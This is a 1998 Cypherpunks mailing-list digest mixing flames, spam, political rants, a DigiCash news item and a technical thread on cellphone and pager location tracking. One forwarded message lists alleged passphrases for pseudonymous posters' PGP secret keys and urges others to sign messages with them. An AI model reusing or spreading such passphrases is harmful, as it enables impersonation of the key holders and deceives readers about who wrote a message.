Message-ID: <199809172218.AAA29477@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



AIMSX@aol.com wrote:
>Hmm, well, you were wrong about many things.
>
>I use 100 accounts because it is so easy to get all the new users, and the
>changed passwords with the way they are set up, so why stop at one, and if
>that one is disabled, I would like something to fall back on.  

d00d!  would you mind posting some of those access codes, logon id's, phone
numbers?  i sure could use a few!  certainly you don't need all 100.  thanks a
million!  make sure that you send them to the cypherpunks list so that all the
fed guys reading this list will see them.  the feds like to use stolen accounts
too, they can cover their tracks better that way.

TotoMongrel II(tm)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 17 Sep 1998 23:39:08 +0800
To: dcsb@ai.mit.edu
Subject: Questions for Magaziner?
Message-ID: <v04011700b22791ad2d2d@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



I spoke at the Electronic Payments Forum here in Boston today, and,
tomorrow, the keynote for tomorrow's lunch is Ira Magaziner.

(BTW, Bill was speaking tonight at the same hotel the conference is in,
probably a bilderberger conspiracy thing, and, when I got out, there was
about a thousand protesters, about 80/20 against, complete with one guy
dressed as a giant cigar, shades of Butt Man?, and a couple of women with
big brunette hair and blue dresses on. With pearl necklaces, of course...)

Anyway, In light of more recent crypto-shenanigans from Billary, and the
fact that this thing's a small crowd, I figured I'd ask if anyone on these
lists had a question they wanted me to ask him.

One I want to ask, right off the top of my head is, "Given your recent
successes in regulating foreign cryptography, what's your timetable for
regulating domestic cryptography?"

;-).

(To the extent that they already *do*, or not, I'll leave as an exercise
for the reader...)

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hark12@eudoramail.com
Date: Fri, 18 Sep 1998 06:08:54 +0800
To: cypherpunks@infonex.com
Subject: cypherpunks, Are You Infringing someone's  trademark rights?
Message-ID: <199809181003.DAA15716@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi cypherpunks,



************************************************************************************
Please reply with subject "remove" to be removed
************************************************************************************
 Every day some small business person finds them selves on the receiving end
of a law suit filed by a multi-national corporation with deep pockets. They
claim infringement on their trademark rights. Currently their wealth means
they are winning by default. We want to make you aware of your rights so
you do not find yourself in the position of being the next "someone" the big
boys decide to make an example of in court.

As a user of the Internet you are entitled to use your domain name, as your
trademark, without fear of being sued. However, not everyone knows the
secrets to proper use and as such they have left themselves wide open to
attack. We have prepared an article titled "How to correctly use your
domain name". We invite you to read it. You will find the article at

http://www.arvic.com/library/domanuse.asp

If you are a small business person using the Internet to market your
business and your products then perhaps you will be interested in reading
the companion article on "How to use your Corporate or Product names as
trademarks". You will find this article at

http://www.arvic.com/library/useoftm.asp

We are Arvic Search Services Inc. We operate TMWeb the "Home of the $25.00
Canadian & American trademark search". Since 1982 we have grown to become
one of the most dominant advocates of small business rights both on and off
the Internet. We help individuals protect their rights to use unregistered,
as well as registered, trademarks without incurring the cost of
registration. We will even show you, at no charge, how to conduct your own
trademark searches.

If you are currently the owner of a trademark then you may find our article
on "The do's and don'ts of Trademark use" of interest. You will find this
article located at;

http://www.arvic.com/library/buz004.asp

We believe it is in your best interest to learn as much as you can about
trademarks, the rights of trademark owners and your rights as an Internet
citizen. We invite you to visit our web sites. There you will find, in
addition to the above, a number of guides and "How to" articles that should
be of assistance. You will also learn more about us and the services we
offer. When you visit our sites you will find our North America wide toll
free phone number located on the bottom of every page. We encourage you to
call and discuss any trademark, trade name or domain name issue of concern
to you.

Victor G. Arcuri
Arvic Search Services Inc.
Registered Trademark Agents
#1710, 505 - 3rd Street SW
Calgary, Alberta  Canada  T2P 2E6
Local Phone (403) 234-0844  Local Fax (403) 294-0944
Toll Free across North America 1-888-227-8421
Please visit our web sites
http://www.arvic.com    and    http://www.tmweb.com
___________________


This is the first time I have done this type of promotion. I am not even
certain that I have worded this information correctly. If you see where I
have made a mstake by omission then I ask that you advise me of same so
that I get the best possible return from these mailings.

We did not discuss whcih day of the week you would be sending the mail. I
would ask that you waite until next tuesday to send the Canadian. Monday is
a holiday. The US mailings can go at your convenience.
--
Victor G. Arcuri
Arvic Search Services Inc.
Registered Trademark Agents
#1710, 505 - 3rd Street SW
Calgary, Alberta  Canada  T2P 2E6
Local Phone (403) 234-0844  Local Fax (403) 294-0944
Toll Free across North America 1-888-227-8421
Please visit our web sites
http://www.arvic.com    and    http://www.tmweb.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Thu, 17 Sep 1998 22:25:30 +0800
To: cypherpunks@toad.com
Subject: New project
Message-ID: <19980918032005.24338.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



Fun thing to do...... read the Starr Report, then
find all the days and times that they did nasty stuff..... then
find pix of the President at public engagements,
meetings, speeches, etc. just before and just after these
sex acts....... set up a Web Site with these pix of
him speaking, or shaking hands with an old lady, or
talking to a class of kids......put in the HTML Page how 
many minutes, hours, ect., before or after the pix was taken that he was doing what
act!!!!!!!!!!!

SOMEBODY DO THIS, IT WILL BE FUNNY HA HA!!!!!!


P.S. This is not my original Idea, everbody's talking about it
here at work, and I don't know how to get to the right databases
to find the pix, so don't ask me.................




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Thu, 17 Sep 1998 22:31:04 +0800
To: cypherpunks@toad.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
In-Reply-To: <491b5a5b.36017891@aol.com>
Message-ID: <3601D3DD.79E5E5C2@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



AIMSX@aol.com wrote:
> 
> Hmm, well, you were wrong about many things.
> The ISP runs RH5.1

Which is not significant to this discussion, as Linux does NFS too.  You
have raised an irrelevant point in your (attempt at a) defense. 

Me: 1
You: 0
 
> I don't use the passwd file for anything, as it is shadowed.

What part of "or equivalent" don't you understand?  If you don't already
know, even in a shadowed system, the encrypted passwords reside
*somewhere*.  If you knew that already, you have again raised an
irrelevant point in your attempt at a defense.
 
Me: 2
You: 0

> I don't work there.

So?  I was just giving an example of what it is to have an account on a
network which uses NFS.  I won't even bother awarding myself a point for
this one, but you lose one, for such a pointless statement.

Me: 2
You: -1

> I use 100 accounts because it is so easy to get all the new users, and the
> changed passwords with the way they are set up, so why stop at one, and if
> that one is disabled, I would like something to fall back on.

Ohhhh, I see.  You really *do* have 100 different logins!  Now, back to
my original question: "Wtf do you use 100 different accounts for?"

Hmm, so what you're essentially saying is, you're doing some stuff that
might get your account disabled (such as email bombing, spamming,
posting moronic stuff to usenet, or downloading too much kiddie porn).

Now let's all think really hard for a second.  Who could possibly be the
cause of any disabling that occurs to this fellow's account?  Could it
be, the ISP?  *YES*, (you win a cookie).  Now, if the ISP's sysadmin
looks at this fellow's account and says, hmm, I'm going to disable this
loser's account, mightn't that very same sysadmin think to himself,
"ooo, look at this, the guy's got 99 other accounts.  Maybe I'd better
disable them, too, otherwise, disabling this one account won't have much
of an effect."

Ok class, it's time for a quiz.  In the scenario above, what kind of
good would having 100 different accounts at the same ISP do you?  The
answer?  Absolutely None.
 
> You just don't understand anything about why I do what I do. 

No no, I understand completely.  You're an idiot.  :)

> If you were
> illegally using an account, would you want to ONLY have 1?

Oh, you're using it *illegally*?  Why didn't you say so *before*?  In
that case, my flaming becomes so much easier.  When your (unwitting) ISP
disables one of your accounts, they will very likely run a check on
their system for any other little nasties which may be around.  (as they
will assume that their system has been compromised at superuser level)
They will very easily find the accounts which shouldn't technically
exist, and delete them.  

If, on the other hand, you've just found the passwords for a bunch of
otherwise legitimate users, you'll be screwed when the ISP sends an
email to all the users telling them to change their passwords.

>  Why wouldn't you
> want to know you had something to fall back on if that one is disabled?

Because having X number of extra accounts at a single ISP will *not*
give you anything to fall back upon when one of them is disabled.

But don't worry, I seriously doubt that you have the knowledge necessary
to do anything more obnoxious than send foolish emails to the
cypherpunks list.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 17 Sep 1998 21:35:10 +0800
To: cypherpunks@toad.com
Subject: Re: remove
Message-ID: <199809180220.EAA14123@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 17 Sep 1998, zKRv wrote:

> 
> remove
> 
> 

Please! Not here, zKRv! Please do that in the privacy of your own home or,
following the U.S. President's example, in the halls of the White House or
in front of a window in the Oval Orifice.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Thu, 17 Sep 1998 23:18:08 +0800
To: Matthew James Gering <mgering@ecosystems.net>
Subject: Re: Democracy... (fwd) The Nature of Religion
In-Reply-To: <33CCFE438B9DD01192E800A024C84A192846AD@mossbay.chaffeyhomes.com>
Message-ID: <3601E054.999D3DE2@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Actually, you may be interested to know that *everyone* is religious, in
some manner.  Everyone has at least one untestable assumption about the
world.  That is, everyone has a kind of faith.  Let's give some
examples:

Christians believe that there exists a Being, called God, which somehow
created the universe and guides (or not, depending on whether or not
you're a Deist) its development.  Furthermore, they believe that Jesus
Christ was the son of God.  This is an untestable assumption.  Nobody
can *prove* that God exists.  They simply choose to act on the
assumption that He does.

Moslems believe in the existance of a different God, and have different
rules and details in their religion, but their fundamental assumption is
the same.  God exists.  God created the universe.  They can't prove any
of it, but they nevertheless choose to act as if it is true.

Atheists believe that God *doesn't* exist, which is essentially the same
kind of belief that is described above.  If you can't prove that God
*does* exist, you can't prove that He doesn't exist either.  This is
their untestable assumption about the universe.

Even people who are nonreligious, or agnostic, have a religion.  For
them the question is not whether or not God exists,--they don't know one
way or the other-- but whether or not the *universe*, (the external
world) exists apart from themselves.  After all, if I choose to believe
that the universe doesn't exist, and is instead some dream that I'm
entertaining myself with, there is no test you can perform which can
convince me otherwise.  Similarly, if I choose to believe that the
universe *does* exist apart from myself, there is no test that can be
carried out what will convince me otherwise (because, if it *doesn't*
exist, I must be very good at decieving myself).

The Transcendentalists of the 19th century, for example, do not really
believe that the universe exists apart from themselves.  They believe
that the human mind (or, more specifically and honestly, their minds)
are what governs the way the universe works.  To them, when men
"discover" new effects in nature, those effects are a direct result of
the discovery.  That is, that the belief in the effects are what cause
the effects.  To them, the map is the territory.

Scientists tend to think differently.  Their beliefs can be described by
those laid out in General Semantics.  "The map is not the territory; the
word is not the thing."  That is, the universe exists *apart* from our
conceptions of it.  This is my personal religion.  I begin from the
fundamental assumption that the universe does in fact exist apart from
myself, and base all further beliefs on that.  

I personally feel that this philosophy is one of the most mature and
socially responsible ones in existance, because, knowing that the
universe is not in fact something I've dreamed up, I know that other
people are emphatically *not* mine, and that I have no natural right to
impose my will upon them in any coercive way.  This is quite different
from the stance that many God followers and Transcendentalists take.

But then, that's just my biased point of view, since I'm religious and
everything. :)



Matthew James Gering wrote:
> 
> > Atheism means that one believes that there is no God.
> 
> You trying to claim atheism is a religion itself is like the christians
> always claiming non-christians are satin worshippers. Forget about the
> origination of the word, in today's reality most atheists simply forgo
> religion completely.
> 
> There is no reason to think that a god does exist, so why would one even
> need to think about or believe in the negative.
> 
> > Ah, so there are personal beliefs that aren't religion and
> > then there are personal beliefs that are?
> 
> Yes, beliefs based on valid reason, empiricism and science are not
> religious, the generally follow the path from conjecture to theory to
> fact. You may hold lots of personal conjecture that do qualify as
> beliefs but are not religious in nature, they are not exempt from
> empirical evidence and the laws of thermodynamics. Beliefs based on
> faith and mysticism are religious. Religion is irrational.
> 
> > What a self-rightous, pretentious,  egotistical viewpoint.
> 
> Thank you.
> 
> > Actualy not, the vast majority of people believe in God, just not your
> > particular brand - which after all is what the 1st is all about.
> 
> Perhaps in Bible-belt Texas, not around here (not in the city anyway).
> 
>         Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Thu, 17 Sep 1998 21:29:50 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: your mail (fwd)
In-Reply-To: <199809180114.UAA00306@einstein.ssz.com>
Message-ID: <Pine.BSF.3.96.980918043049.3195C-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



Mitnick is in jail. Crypto or no crypto.

---Lucky


On Thu, 17 Sep 1998, Jim Choate wrote:

> 
> Forwarded message:
> 
> > Date: Thu, 17 Sep 1998 17:16:16 -0700
> > From: Greg Broiles <gbroiles@netbox.com>
> > Subject: Re: your mail
> 
> > At 05:28 PM 9/17/98 -0400, mgraffam@mhv.net wrote:
> > 
> > >Damn.. are cypherpunks the only people in the universe smart enough to u=
> > se
> > >PGP?!?
> > 
> > And a lot of good it's done the two who've been busted so far .. doesn't
> > look like encryption is a serious obstacle to legitimate law enforcement =
> > to
> > me.
> 
> Mitnick certainly took advantage of it.
> 
> 
> 
>     ____________________________________________________________________
> 
>                             The seeker is a finder.
> 
>                                      Ancient Persian Proverb
> 
>        The Armadillo Group       ,::////;::-.          James Choate
>        Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
>        www.ssz.com            .',  ||||    `/( e\      512-451-7087
>                            -====~~mm-'`-```-mm --'-
>     --------------------------------------------------------------------
> 
> 


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Thu, 17 Sep 1998 15:21:14 +0800
To: cypherpunks@toad.com
Subject: Encryption and Terrorists
Message-ID: <7874ed1d5f47be94688551065bac8ea5@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Wake up America! Encryption doesn't kill people!  Terrorists do.
Would you give the keys to your house to the government? Just in
case they have to break in? NO!  How about your ATM PIN #, just in case
you don't pay your taxes? NO! So don't give out your keys that you use
for
encrpytion and don't let the government have a way to get them either!

Just say NO to the UNCONSTITUTIONAL idea of Limited Privacy! After all,
we are not COMMUNISTS.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 18 Sep 1998 05:14:12 +0800
To: Greg Broiles <cypherpunks@cyberpass.net
Subject: Re: Mark Twain/Mercantile dumps Digicash
In-Reply-To: <Pine.BSF.4.02.9809172051050.8485-100000@ideath.parrhesia.com>
Message-ID: <199809181015.GAA04293@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:04 PM 9/17/98 -0700, Greg Broiles wrote:
>
>According to
><http://www.thestandard.com/articles/display/0,1449,1721,00.html?home.mf>,
>Mark Twain Bank/Mercantile Bank will no longer support DigiCash. They are
>no longer listed as an issuer of ecash on Digicash' website. Neither
>organization seems to have information available via the web about the
>decision to terminate the service.
>
>--
>Greg Broiles
>gbroiles@netbox.com


I thought this was already known or I would have said:

"Mark Twain Bank (MTB), a small bank headquartered in the Midwest, took a
bold step
three years ago when it became the first bank in the world to offer
privacy-protecting eCash
accounts.  In April, 1997, however, MTB was bought out by Mercantile Bank,
and the larger,
stodgier bank recently decided to drop the eCash program."

They probably weren't making any money.  I wonder if Mercantile will drop
MTB's foreign currency accounts as well?

DCF 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 17 Sep 1998 23:38:31 +0800
To: cypherpunks@cyberpass.net
Subject: Scorched Earth
Message-ID: <199809180440.GAA25125@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



URL: http://cnn.com/TRANSCRIPTS/9808/09/se.01.html

:: Special Event
:: 
:: Investigating the President: Can Bill Clinton Escape the Perjury Trap?
:: 
:: Aired August 9, 1998 - 4:00 p.m. ET 
:: 
:: 
:: Gene Randall in Washington
:: DAVID CORN, "THE NATION" MAGAZINE
:: DONALD LAMBRO, "WASHINGTON TIMES"
:: ALEXIS SIMENDINGER, "NATIONAL JOURNAL"
:: 
:: 
:: RANDALL: Don, you've got a story today about what could happen if
:: Republicans press for impeachment on, basically, a sex case against the
:: president. A Democratic scorched-earth policy against the GOP. Tell us
:: about that?
:: 
:: LAMBRO: Well, a number of reports, and I talked to other Democrats who
:: confirm this, that if this goes to House of Representatives, if there is
:: an impeachment inquiry, it is going to be a scorched-earth policy by the
:: Democrats to go after the Republicans in the House, in the leadership,
:: dig up all the dirt they can on leadership, on members, Republican members
:: of the House Judiciary Committee. It's going to be the same thing they
:: did in campaign finance scandal -- Everybody does it, what's the big deal.
:: 
:: RANDALL: Would this fly?
:: 
:: CORN: Well, people I talk to don't really have a -- it's more a sentiment
:: than a plan. And I don't think it's actually going to come into being
:: because we're not even going to get close to impeachment, because it's
:: just not in the Republicans' political interest to drag this stuff up,
:: and if people go back look at what Newt Gingrich did with his first
:: wife, and all this stuff. It's just -- they have no political interest
:: in doing this, so they will not do so.
:: 
:: RANDALL: We got to get Alexis in here.
:: 
:: SIMENDINGER: You don't need to execute the plan. You just have to let
:: people think it's out there, and it's going to have a chilling effect.
:: 
:: LAMBRO: The Democrats, I think, are closer than you think. They just hired
:: three lawyers to prepare them for impeachment on the Judiciary Committee.
:: 
:: CORN: Well, how many have the Republicans hired already; they have a
:: whole task force on impeachment that has been studying the issue. They
:: are going to blink. They are not going to do this.
:: 
:: LAMBRO: All right, three attorneys to prepare them for impeachment
:: proceedings.
:: 
:: RANDALL: Let's all take time to blink, because we must take a
:: break. Coming up, memories of Watergate and those who caution on getting
:: those memories straight. Stay with is.
:: 
:: (COMMERCIAL BREAK)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 18 Sep 1998 07:14:07 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Democracy... (fwd)
Message-ID: <199809181240.HAA02855@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 17 Sep 1998 22:18:44 -0700 (PDT)
> From: "Brian W. Buchanan" <brian@smarter.than.nu>
> Subject: Re: Democracy...

> Incorrect.  A parking ticket, like a speeding ticket or other minor
> traffic violations is classified as an "infraction", not a misdemeanor.
> Apparently, even the govts. recognizes that there are so many laws on the
> books now that one can't possibly hope to avoid breaking them.

They're still at least a Class C misdemeanor in the state of Texas.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 18 Sep 1998 07:26:18 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RF networks, spread spectrum (fwd)
Message-ID: <199809181251.HAA03092@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 17 Sep 1998 22:31:22 -0700 (PDT)
> From: Greg Broiles <gbroiles@netbox.com>
> Subject: RF networks, spread spectrum

> Cpunks interested in radio networking and spread spectrum apps might find
> the following links useful - 
> 
> <http://www.tapr.org/tapr/html/fhsspaper.97.html> describes the design of
> a 900 mhz spread spectrum 128kb/s TCP/IP radio network with 10baseT
> input/outputs;
> 
> <http://www.tapr.org/ss/qexss.html> provides an overview of spread
> spectrum projects/regulations/applications
> 
> <http://www.tapr.org/ss/index.html> has links to more spread spectrum
> stuff. 

Another source of related information is the AX.25 Level 2 support built
into the current Linux kernels. If you're using SuSE 5.3 it's located on
the install CD at:

/unsorted/Amateur-Funk

&

/usr/src/linux/Documentation/networking/ax25.txt

In the SuSE manual (pp. 188) it says:

"Enables data transfer via CB"


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Sep 1998 07:22:01 +0800
To: cypherpunks@toad.com
Subject: CJ Message
Message-ID: <199809181213.IAA20276@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



This allegedly is forwarded from CJ, though from an unknown source 
so think twice:

    Thu, Sep 09 1998 

    part of a communication received via the anonymous route:

      "In the meantime, I hope that anyone who has possession of 
      the PGP Secret Keys for Toto, TruthMonger, Son of Gomez, Magic 
      Circle, etc., feels free to use them to digitally sign messages 
      to the CyperPunks Disturbed Male LISP.

      "Passwords:  sog, sog709, sog709cejCJP,sog709cjpCEJ, D'Shauneaux, 
      D'shauneaux, and others..."

---------

Some of CJ's amazing output related to the message above
is archived at:

   http://www.uneedus.com/~dave/library.html

See "Psychotic."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leif Ericksen <phantom@wwa.com>
Date: Fri, 18 Sep 1998 08:20:45 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Encryption and Terrorists
In-Reply-To: <7874ed1d5f47be94688551065bac8ea5@anonymous>
Message-ID: <36025B1F.BAF0F59@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> Wake up America! Encryption doesn't kill people!  Terrorists do.
> Would you give the keys to your house to the government? Just in
> case they have to break in? NO!  How about your ATM PIN #, just in case
> you don't pay your taxes? NO! So don't give out your keys that you use
> for
> encrpytion and don't let the government have a way to get them either!
> 
> Just say NO to the UNCONSTITUTIONAL idea of Limited Privacy! After all,
> we are not COMMUNISTS.

You make some interesting comments, but here is a few issues to
consider.  Yes, in AmeriKa we are free or are we?

In America the government already has our keys to our house. *IF* they
suspect us of something YES we are free to say *NO* you may not enter my
house.  However, if they come with a search warrant you had better let
them in or they will break down your door, you had better help them find
what they want or they will tear apart your house looking for said items
stated in the search warrant.  *IF* they do not find it, it is the
responsibility of the searching organization to have repairs done for
the damage. (So I have been told by a friend whose brother is a cop.)

You talk about an ATM PIN number, well here is the bigger problem, we
have a Social (Insecurity) Number.  Once you take it and use it you have
stated YES, I will pay my taxes, you pay once you pay for life. (Taxes
were originally voluntary when the program started.  Now it is forced. 
At least that is what I have heard, I have not researched it yet.  NOTE:
to any IRS agents, I Do and will continue to pay my taxes.  I do not
like it but I rather pay then have you come in and take everything)

Back to the point with the SSN the IRS can freeze ALL your Assets and
lock up your bank accounts and say this money is OURS, they can also
come in and kick you out of your house. (My father had some co-workers
that owed some money to the government, and made the mistake of saying
they could not pay and that they should just take his house.  Guess what
the IRS said MOVE OUT it is OURS!  He should have asked for a payment
plan, he would have been better off.)

No we are not communists, however our country is NO LONGER a REAL
Democracy, it is more of a dictatorship. The government for the people
BY THE PEOPLE is no longer.  IT is a GOVERNMENT FOR THE GOVERNMENT  BY
THE GOVERNMENT.

Think of it we vote for who we want, but do we really get what we want?
Think of it Congress wants a raise they make a motion and vote on it.
DO they let the public vote on it? NO.
Think of it we pay taxes and boy do we pay taxes depending on what state
you live in we have such as the following.
	1) Sales
	2) Property
	3) Income 
 	    - Federal	
	    - State
                 The following are some that some areas are trying to 
                 get in place.
	    - local (township/county)
	    - city
	4) Phone taxes
            - Federal
	    - State
            - City
            - (local and state additional charges?) TAX upon TAX.
	    - Federal PIC Charge. TAX UPON TAX UPON TAX.
	5) Death.
	6) Inheritance.

I know I missed a few here, and I am sure there are some anti tax folks
out here that could list every single one.  Just think of it though,
when you add all the little taxes up we probably are paying close to 50
- 60% tax rates.  Think of it, the internet is partially funded by our
INCOME tax, and they add an extra tax to it on our phone bill and call
it as such.  Think of it MOST OF THE MAJOR carriers in the US
MCI, SPRINT, AT&T are the PROVIDERS of internet connectivity and we pay
taxes to them already?  Is that about triple or four times taxed there?

I just hope that we do not have a major revolt, against the taxes and
the government.  *IF* we do I am willing to BET if it is really bad like
the revolts WAY back to the time of the Boston Tea Party the UN will
step in and send the MIlitary (US) and say control those folks.  I hope
I do not live to see that.

I will Continue to pay my taxes, and I will continue to vote for who I
think can do the job.  I will start working on getting a business
running so that I can take advantage of all the tax breaks of running a
business.  BUT I will keep it all legal.  That is the only way to get
things going better for yourself is to own your own business, and make
it small enough that it can be just you and your family.


					- lhe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip Mefford <cmefford@video.avwashington.com>
Date: Fri, 18 Sep 1998 07:24:57 +0800
To: Dave Emery <die@pig.die.com>
Subject: Re: Mobile phone tracking, pagers, etc
In-Reply-To: <19980917222329.A1364@die.com>
Message-ID: <Pine.LNX.3.95.980918081019.15546H-100000@video.avwashington.com>
MIME-Version: 1.0
Content-Type: text/plain





Actually, 

there seems to be a screw up out  there.

Right now, one can go down the 7/11, and pay 
cash for a prepaid cellphone, and renew it with 
cellphone time cards also purchased with cash.

No paperwork, NONE.

I have one.

While all of the technology applies, and certainly it is possible
to determine things by analyzing calling habits, I can't see how one
can easily determine who has cellphone #blahblahblahblahblah when 
you just bought a box at an out of town 7/11 during the breakfast
rush with cash.

Esp if one doesn't make a lot of calls.

On Thu, 17 Sep 1998, Dave Emery wrote:

> On Thu, Sep 17, 1998 at 11:56:02AM -0700, Matthew James Gering wrote:
> > 
> > Regarding the tracking of mobile phones, are all current types of phones
> > susceptible?
> > 
> > There was a recent post here regarding tracking of GSM phones.
> > TDMA/CDMA, analog/digital, PCS-band, etc, are they all equally capable
> > of being tracked?
> 
> 	All the wireless standards I am aware of allow for registration
> and polling phones to find out if they are on and available without
> ringing them. This provides silent location information to the nearest
> cell of a phone merely turned on, location  which may be hundreds of
> feet in tightly congested urban areas and tens of square miles in
> suburban and less populated areas.   Some system operators apparently
> use this feature with all active phones to relieve congestion on paging
> channels, while others do not actively track phones not being used
> except in certain situations or parts of the network.   Of course
> location to a cell is always available during a call...
> 
> 	The FCC has mandated that this cell-granularity location
> information be made available to E-911 centers on emergency calls, and
> there may be some situations in which it is currently made available to
> domestic law enforcement under other circumstances, though CALEA
> restricts such availability without warrents.  Whether and under what
> circumstances law enforcement can request a poll be transmitted
> (re-registration) to locate a silent but powered phone is less clear.  
> It would seem that CALEA forbids this, but what in fact is the practice
> by such agencies as the FBI working quietly with cell carriers in places
> such as NYC is less clear.
> 
> 	In the future FCC rules will require that all E-911 calling
> wireless phones be located to 125 meters 67% of the time.  There are
> proposals to do this with differential time of arrival (DTOA)
> or other direction finding techniques (apparently a hard problem
> in cities with lots of multipath propagation due to reflections)
> that work passively on some or all cell calls and registrations
> (thus allowing tracking of everybody), or by cooperation with the
> cellphone handset that could be only turned on when the user wished
> to be located (an E-911 emergency) and disabled otherwise.   One
> version of this would use GPS rather than ranging or other techniques
> to determine position relative to the cell sites.    Of course all
> the user disaablable  techniques such as GPS and DTOA done in the handset
> firmware only will work with future cell firmware and hardware
> and not legacy handsets, and because of this may not be acceptable
> to the FCC.
> 
> 	There are some distinctions between CDMA, GSM, analog and TDMA
> (non GSM), in respects to exactly how easy it is to implement precision
> location meeting the FCC spec passively and on all calls at all times.
> Apparently CDMA with its very tight power control to minimize the near-far
> problem makes it fairly awkward to reliably triangulate position from
> multiple sites since the mobile may be only detectable at one site
> at any time...  What this means in practice is that some wireless
> technologies are more likely to require some definate active firmware
> intervention to do precision location, whilst others may allow it
> with no special intervention.   If the FCC allows this intervention
> to be enabled by a user, this may provide some opportunity for
> location privacy.
> 
> 
> > 
> > However pagers are not, correct? They just broadcast an entire area to
> > page instead of the pager keeping the network informed of their
> > location.
> 
> 	The one way pagers work this way.  The guaranteed delivery two
> way pagers do support registration and will know the location of
> the pager after a page has been sent to it and any time the system
> wants to determine it.   This location will be quite coarse with current
> two way (reFlex) pagers with cell sites some distance apart, but 
> DF techniques are quite possible and could be implemented by law
> enforcement or spooks or other interested groups.  Unlike wireless phones
> there is no current FCC requirement for positioning information distribution
> or precision positioning infrastructure, so two way pagers aren't
> likeyly to be routinely located accurately any time soon.
> 
> 	Of course most modern wireless phones support paging message
> delivery, so more and more people will be using wireless phones with
> the FCC mandated tracking accuracy for paging...
> > 
> > One thing I have long wondered: Why don't they make phones that
> > "wake-up" by a paging signal and then accept the call? It might increase
> > the connect time significantly, but it would also increase the potential
> > stand-by time indefinitely, and the location of the user is only exposed
> > when calls are in progress, not while the phone is on stand-by.
> > 
> 	Wireless phones do currently work this way.  They listen to the
> forward control channel for a paging message that says they have got a
> call coming in and only then do they transmit.  The amount of power used
> in transmitting would quickly use up the battery if they continuously
> broadcast.  The problem with cellphone location is that they can also be
> paged with a registration request that does not cause them to ring
> or show any evidence of transmitting, but sends back a brief message
> burst (not using much battery).   This can be made to happen every
> so often, or only when polled.
> 
> 
> > Are there any paging services (particularly alpha paging) that work on a
> > global scale? You would think daily pager rental service (esp. at
> > airports) would be popular. You could have an email address, even a
> > static phone number, that could re-route messages to any pager that you
> > happen to have at the time (PSTN-IP-PSTN, or even easier if the pager
> > service gives SMTP addresses, which most do these days).
> > 
> 	There are nationwide pager services that broadcast your pages
> over very wide areas or depend on registration to locate you down to
> a smaller area.  But yes, you can get paged anywhere in the US and
> several other countries.  And the new LEO satellite technology will
> allow paging over whole continents or potentially anywhere in the world.
> 
> 
